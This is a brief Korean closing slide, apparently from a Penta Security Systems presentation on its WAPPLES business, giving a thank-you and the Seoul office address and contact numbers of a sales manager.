Ver. 10.0 감사합니다 펜타시큐리티시스템 서울시영등포구여의도동 25-11 핚짂해운빌딩 20층와플사업부 / 박기범차장 Tel: 02-2125-6641 / M.P: 010-2336-8604 / Fax: 02-786-5281